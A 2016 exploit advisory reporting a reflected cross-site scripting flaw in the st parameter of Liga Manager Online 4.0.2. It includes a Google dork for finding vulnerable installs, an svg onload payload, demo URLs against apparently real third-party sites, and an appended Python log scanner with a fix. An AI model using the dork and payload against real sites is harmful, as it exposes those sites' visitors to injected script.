Liga Manager Online 4.0.2 Cross Site Scripting
Posted on 29 January 2016
######################
# Exploit Title : LMO 4.0.2 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.liga-manager-online.de/homepage/
# Google Dork : "LMO 4.0.2" inurl:"st="
# Date: 2016/01/28
# Version = 4.0.2
######################
# PoC: st=[XSS]
# Payload = '>Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo :
#http://www.wildeligabremen.com/LMO/lmo.php?action=results&file=noname.l98&st=13%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.bb-american-dart.de/lmo/lmo.php?action=results&file=C-Liga.l98&st=14%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.fortuna-futsal.de/lmo2/lmo.php?action=results&file=Niederrheinliga%202015-2016.l98&st=4%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.uslaval.it/liga/lmo.php?action=results&file=La%20Val.l98&st=3%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&PHPSESSID=83b06c0e762470bcd58c8fac2ce9a19d
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
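
A log-side check for the issue above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to lmo.php whose st parameter decodes to anything other than a short integer. That st is normally numeric is an assumption drawn from the demo URLs (st=13, st=14, st=4, st=3); the log lines and the names suspicious_st and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_st(log_line):
    """Return the decoded st value when a request to lmo.php carries a
    non-numeric st parameter, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/lmo.php"):
        return None
    # parse_qs percent-decodes each value; keep_blank_values so "st=" is seen too
    for value in parse_qs(url.query, keep_blank_values=True).get("st", []):
        # Assumption: legitimate st values are plain integers (see the demo URLs)
        if not re.fullmatch(r"\d{1,4}", value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_st) for every flagged log line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_st(line)) is not None]


# Constructed sample log lines (documentation addresses, made-up file name)
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2016:10:00:01 +0000] '
    '"GET /lmo/lmo.php?action=results&file=demo.l98&st=13 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [29/Jan/2016:10:00:09 +0000] '
    '"GET /lmo/lmo.php?action=results&file=demo.l98&st=13%27%3EPersian%3Csvg'
    '%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team HTTP/1.1" 200 5188',
    '192.0.2.10 - - [29/Jan/2016:10:00:15 +0000] '
    '"GET /index.php?st=%3Cb%3E HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-numeric st value {value!r}")
```

The same allow-list (digits only) applied to st on the server before it is written into the page is the corresponding fix; any value that must be echoed should also be HTML-encoded on output.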